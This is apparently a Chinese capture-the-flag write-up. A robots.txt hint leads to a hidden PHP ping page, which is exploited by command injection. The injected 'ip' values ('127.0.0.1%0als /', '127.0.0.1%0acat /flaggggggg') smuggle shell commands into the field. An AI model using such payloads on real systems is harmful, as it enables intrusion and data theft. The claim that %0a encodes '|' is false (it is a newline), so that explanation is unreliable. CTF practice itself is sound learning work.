Robots.txt
robots.txt是一个协议,而不是一个命令。robots.txt是搜索引擎中访问网站的时候要查看的第一个文件。robots.txt文件告诉蜘蛛程序在服务器上什么文件是可以被查看的。在CTF中常用于提示解题思路
打开题目
看到了没用的提示,看题目是Robotsi联想到可能存在Robots.txt文件
打开后发现有一个PHP文件,访问看看
其实到这里才算是真正打开了题目,这是一个ping的页面
通过get方式传参来利用
我这里传了一个/?ip=127.0.0.1 | ls 发现无法利用于是接着寻找别的利用方法
最终发现%0a可以利用,这个是url编码后的|,图中已经可以看到目录回显了
接下来就是查找flag了。构造http://43.139.56.67:877/6af3223f1176293c.php?ip=127.0.0.1%0als%20/
命令是列出根目录底下的文件,已经可以看到flaggggggg
再使用cat命令查看flag,构造http://43.139.56.67:877/6af3223f1176293c.php?ip=127.0.0.1%0acat%20/flaggggggg
即可得到flag
flag{easy_command_injection}